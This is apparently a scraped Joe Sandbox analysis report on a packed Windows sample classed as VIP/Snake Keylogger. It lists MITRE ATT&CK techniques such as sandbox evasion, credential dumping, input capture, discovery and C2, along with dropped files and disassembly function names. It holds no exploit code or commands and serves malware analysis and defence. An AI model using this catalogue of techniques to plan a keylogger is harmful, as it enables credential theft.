Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cspmtibh.w1g.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghqruusq.dbt.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwyyloqs.uxv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xq2qdmiu.t02.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Function 06CA1537 Relevance: 1.8, APIs: 1, Instructions: 270
processCOMMON

Function 06CA1540 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 06CA12B0 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Function 06CA12B8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 06CA1118 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Function 06CA13A3 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 06CA13A8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 06CA1120 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 06CA11F3 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 06CA11F8 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Function 06CA1068 Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Function 06CA1070 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Function 06CA412B Relevance: 1.5, APIs: 1, Instructions: 45
windowCOMMON

Function 06CA4130 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre